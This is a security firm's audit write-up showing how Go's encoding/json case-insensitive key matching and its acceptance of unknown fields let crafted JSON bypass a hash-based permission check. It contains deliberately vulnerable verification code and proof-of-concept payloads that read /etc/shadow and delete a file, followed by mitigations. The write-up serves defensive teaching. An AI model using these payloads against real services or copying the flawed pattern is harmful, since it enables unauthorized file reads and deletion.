Security Gaps in JSON Unmarshal: Lessons from a Go Audit

Security Gaps in JSON Unmarshal: Lessons from a Go Audit

This post was written by an Anvil Secure Security Engineer.

During an audit of a Golang service, I came across an interesting section of authorization code. The application unmarshalled user-supplied JSON data into a struct to perform an integrity check. If the check failed, the request was rejected. If the check was successful, the JSON data was unmarshalled again, this time into a map[string]interface{}, and was used at a later point in the request execution. This post explores observations made throughout the audit

The Golang service used Go's standard library for parsing JSON, encoding/json. It leveraged two default behaviors in the library to bypass the integrity check and escalate privileges. Two attack vectors were identified, and each relied on a different behavior of the JSON parser. It was interesting to see how each was leveraged to exploit the service.

Go's encoding/json Initial Observations


1. Struct Field Matching is Case-Insensitive

The application’s most surprising behavior is that object keys are matched to the struct field or tag in a case-insensitive manner. Github issue #14750, which was created in 2016, is about this behavior.

The mailing thread linked in the issue gives the following example:

type Header struct {
    Alg string `json:"alg"`
    Typ string `json:"typ"`
}

func main() {
    b := []byte(`{"typ":"JWS","alg":"HS256","ALG":"none"}`)
    var h Header
    err := json.Unmarshal(b, &h)
    fmt.Println(h)
}

Parsing {"typ":"JWS","alg":"HS256","ALG":"none"} into the Header struct results in Header.Alg having the value none instead of the expected value HS256.

This is confusing given that the json.Unmarshal documentation states that exact matches are preferred:

  • To unmarshal JSON into a struct, Unmarshal matches incoming object keys to the keys used by Marshal (either the struct field name or its tag), preferring an exact match but also accepting a case-insensitive match.

The reality is that Go will accept the last key parsed that matches regardless of its case.

Considering the number of related issues on Github, this is a common pain point:


2. Unknown Fields Are Allowed By Default

By default, the parser does not return an error if the JSON object has keys that do not match any of the struct's fields. This can be useful if you want to only match a subset of fields in the object. Thankfully, it is possible to configure the decoder to return an error instead using Decoder.DisallowUnknownFields().


3. Duplicate Fields Are Allowed

Despite this behavior not being exploited, it’s worth mentioning that the parser will not return an error if duplicate object keys are present. As mentioned earlier, the parser will accept the last case-insensitive match. This is a known issue discussed in #48298.

In the example above, parsing {"typ":"JWS","alg":"HS256","alg":"none"} would result in Header.Alg having the value none.

This can become an issue when JSON data is handled in a multi-language environment. Parser differentials can result in security issues, like CVE-2017-12635, where the Erlang-based JSON parser used the first matching key and the Javascript-based parser used the last matching key.

Service Example

The behaviors above are not exploitable on their own. They require the right conditions to be present, and the service I was auditing had those conditions. The gist of interaction is:

  • An authenticated user makes a requests to control-plane to access another service
  • If successful, a token and a JSON blob is returned. The token is signed and includes a SHA256 hash of the JSON blob
  • The user sends a request to the other service with parameters, the token, and JSON blob
  • The service verifies the request by extracting the hash from the token and comparing it with the hash of the provided JSON blob
  • If the hashes do not match, the request is rejected
  • If they do match, the request is processed

(In case you are wondering, there were valid reasons the JSON blob was not included in the signed token.)

The interesting part of the verification code was that it performed json.Unmarshal twice, first unmarshalling into a struct to perform the verification, and then into a map[string]interface{} if the verification passed.

The verification code looked something like this:

type ActionToVerify struct {
    Resources []string `json:"resources"`
    Read      bool     `json:"read"`
    Write     bool     `json:"write"`
}

type AuthDataToVerify struct {
    AllowedActions []ActionToVerify `json:"allowed_actions"`
}

func generateHash(data AuthDataToVerify) (string, string) {
    dataStr, _ := json.Marshal(data)
    hash := sha256.Sum256(dataStr)
    hashHex := hex.EncodeToString(hash[:])
    return hashHex, string(dataStr)
}

func verifyPermissions(hash, userAuthData string) (map[string]any, error) {
    var authData AuthDataToVerify
    var verified map[string]any

    err := json.Unmarshal([]byte(userAuthData), &authData)
    if err != nil {
        return nil, err
    }

    hashHex, _ := generateHash(authData)

    if hashHex != hash {
        return nil, fmt.Errorf("hash mismatch. got %s", hashHex)
    }

    err = json.Unmarshal([]byte(userAuthData), &verified)
    if err != nil {
        return nil, err
    }

    return verified, nil
}

The data by the verification function was used later and was cast to a different type according the type of resource the user requested. Each of these types aliased map[string]interface{}. For example, if the user requested to perform an action on a file, the map[string]interface{} data would be cast to a FileAction type.

type FileAction map[string]interface{}

const (
    FA_Resources = "resources"
    FA_Read      = "read"
    FA_Write     = "write"
    FA_Delete    = "delete"
)

type FileActionParameters struct {
    Action     string
    TargetFile string
    WriteData  []byte
    // ...
}

func (a FileAction) CanRead(file string) bool {
    for _, perm := range a["allowed_actions"].([]interface{}) {
        perm := perm.(map[string]interface{})
        resource, err := getStringSlice(perm, "resources")
        if err != nil {
            break
        }

        if slices.Contains(resource, file) {
            return perm[FA_Read].(bool)
        }
    }

    return false
}

func (a FileAction) Process(params FileActionParameters) (string, error) {
    switch params.Action {
    case FA_Read:
        if a.CanRead(params.TargetFile) {
            return readFile(params.TargetFile)
        }
    case FA_Delete:
        if a.CanDelete(params.TargetFile) {
            return deleteFile(params.TargetFile)
        }
    }


    return "", fmt.Errorf("unauthorized")
}

One clear issue with this design is that it is a weak contract between the verification function and the FileAction type. Not only is this error-prone, but it increases burden. The fields used in the FileAction type must also be defined on the struct used during verification. From the Language-theoretic security perspective, unmarshalling the data a second time into a map[string]interface{} breaks the service's assumption that the data adheres to the ActionToVerify struct it was verified against.

Attack Vector #1

The first attack vector leveraged case-insensitive field matching. We know that encoding/json matches struct fields case-insensitively and using the last match. Maps with string keys on the other hand are case-sensitive and thus won’t overwrite previously parsed keys that differ only in their case.

In the verification function, the integrity check was performed on the AuthDataToVerify struct.

type ActionToVerify struct {
    Resources []string `json:"resources"`
    Read      bool     `json:"read"`
    Write     bool     `json:"write"`
}

type AuthDataToVerify struct {
    AllowedActions []ActionToVerify `json:"allowed_actions"`
}

The root of this attack vector is providing the key allowed_actions without desired grant and then specifying the key, but with a different case. Any one letter can be changed.

func vector1() {
    fmt.Println("\nVector #1:")
    hash, jsonStr := generateHash(AuthDataToVerify{
        AllowedActions: []ActionToVerify{
            {
                Resources: []string{"/home/user/file.txt"},
                Read:      true,
            },
        },
    })

    fmt.Printf("%s: %s\n", hash, jsonStr)

    var normalHash = hash
    var normalAuthData = `
    {
        "allowed_actions":[
            {"read": true, "resources": ["/etc/shadow"]}

        ],
        "ALLOWED_ACTIONS":[
            {"read": true, "resources": ["/home/user/file.txt"]}
        ]
    }`

    data, err := verifyPermissions(normalHash, normalAuthData)
    if err != nil {
        fmt.Printf("Failed to verify: %s\n", err)
        return
    }

    fmt.Printf("User permissions verified.\nGot: '%+v'\n", data)
    action := FileAction(data)
    output, err := action.Process(FileActionParameters{
        Action:     "read",
        TargetFile: "/etc/shadow",
    })
    fmt.Printf("Processed. \nError: %+v\nOutput: %+v\n", err, output)
}

Running the example, we get the following output:

Running the example, we get the following output:

Vector #1:

8109cdf7567fec8e513b82e19cdae36ce08a6483760dec6375cf58ac3d6fe45c: {"allowed_actions":[{"resources":["/home/user/file.txt"],"read":true,"write":false}]}

User permissions verified.

Got: 'map[ALLOWED_ACTIONS:[map[read:true resources:[/home/user/file.txt]]] allowed_actions:[map[read:true resources:[/etc/shadow]]]]'

Processed. 
Error: 
Output: Read /etc/shadow

 

Attack Vector #2

Earlier I mentioned that the design is error-prone. The fields used in the FileAction type must also be defined on the struct used during verification. This attack relied on the default behavior to allow unknown fields.

If you noticed, the FileAction type had a key defined that was not present in the verifier, FA_Delete.

const (
    FA_Resources = "resources"
    FA_Read      = "read"
    FA_Write     = "write"
    FA_Delete    = "delete"
)

Since this field is not defined on the ActionToVerify struct, it is not accounted for when calculating the hash. An attacker can modify the JSON blob to include this field.

func vector2() {
    fmt.Println("\nVector #2:")
    hash, jsonStr := generateHash(AuthDataToVerify{
        AllowedActions: []ActionToVerify{
            {
                Resources: []string{"/home/user/file.txt"},
                Read:      true,
            },
        },
    })

    fmt.Printf("%s: %s\n", hash, jsonStr)

    var normalHash = hash
    var normalAuthData = `
    {
        "allowed_actions":[
            {"delete": true, "read": true, "resources": ["/home/user/file.txt"]}


        ]
    }`

    data, err := verifyPermissions(normalHash, normalAuthData)
    if err != nil {
        fmt.Printf("Failed to verify: %s\n", err)
        return
    }

    fmt.Printf("User permissions verified.\nGot: '%+v'\n", data)
    action := FileAction(data)
    output, err := action.Process(FileActionParameters{
        Action:     "delete",
        TargetFile: "/home/user/file.txt",
    })
    fmt.Printf("Processed. \nError: %+v\nOutput: %+v\n", err, output)
}

Running the example, we get the following output:

Vector #2:

8109cdf7567fec8e513b82e19cdae36ce08a6483760dec6375cf58ac3d6fe45c: {"allowed_actions":[{"resources":["/home/user/file.txt"],"read":true,"write":false}]}

User permissions verified.

Got: 'map[allowed_actions:[map[delete:true read:true resources:[/home/user/file.txt]]]]'

Processed. 
Error: 
Output: Deleted /home/user/file.txt

Closing Remarks

The example shown here is specific. In real service, there are numerous levels of indirection and abstractions. The code-base is about ten years old, which may have played a factor in some of the choices. Instead of parsing the JSON, hashing could have been performed on the JSON string which would have prevented these attacks.

That said, if Unmarshal did always prefer an exact match for field names, then the first attack vector one would have been prevented. If the default behavior was to reject unknown fields or the developer used Decoder.DisallowUnknownFields(), then attack vector two would have been prevented.

Notably, some libraries already take preventative measures. For example, go-jose/go-jose has a fork of the standard library parser that uses case-sensitive matching and duplicate key checks.

Both of these issues are planned to be resolved in encoding/json/v2. You can track the proposal at #71497.

About the Author

The author of this blog post is an Anvil Secure Security Engineer who specializes in network pentesting, cloud security, and programming languages.

Tools

awstracer - An Anvil CLI utility that will allow you to trace and replay AWS commands.


awssig - Anvil Secure's Burp extension for signing AWS requests with SigV4.


dawgmon - Dawg the hallway monitor: monitor operating system changes and analyze introduced attack surface when installing software. See the introductory blogpost.


HANAlyzer - A tool that automates SAP HANA security checks and outputs clear HTML reports. See the introductory blogpost.


nanopb-decompiler - Our nanopb-decompiler is an IDA python script that can recreate .proto files from binaries compiled with 0.3.x, and 0.4.x versions of nanopb. See the introductory blogpost.


SAPCARve - A utility Python script for manipulating SAP's SAR archive files. See the introductory blogpost.


ulexecve - A tool to execute ELF binaries on Linux directly from userland. See the introductory blogpost.


usb-racer - A tool for pentesting TOCTOU issues with USB storage devices.

Recent Posts